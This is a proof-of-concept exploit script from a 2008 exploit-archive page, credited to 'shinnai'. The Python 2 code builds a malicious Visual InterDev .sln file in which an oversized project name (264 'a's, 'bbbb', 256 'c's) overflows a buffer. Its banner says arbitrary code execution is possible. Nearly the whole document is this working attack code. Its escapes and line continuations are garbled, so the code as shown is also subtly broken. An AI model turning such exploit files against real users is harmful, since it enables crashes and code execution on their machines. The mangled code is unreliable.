Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC
# Published : 2008-04-03
# Author : shinnai
# Previous Title : HP OpenView NNM 7.53 Multiple Remote Vulnerabilities
# Next Title : Xitami Web Server v2.5c2 LRWP Processing Format String PoC

#usage: exploit.py FileName

import sys

print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.orgn"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"

buff      = "a" * 264 + "bbbb" + "c" * 256

try:
    sln_file = 
        'Microsoft Visual Studio Solution File, Format Version 1.00n'+
        'Project("{}") = "' + buff + '"n'+ 
        'EndProjectn'
    
    out_file = open(sys.argv[1] + ".sln",'w')
    out_file.write(sln_file)
    out_file.close()
    print "nFILE CREATION COMPLETED!n"
except:
    print " n -------------------------------------"
    print "  Usage: exploit.py FileName"
    print " -------------------------------------"
    print "nAN ERROR OCCURS DURING FILE CREATION!"

# www.Syue.com [2008-04-03]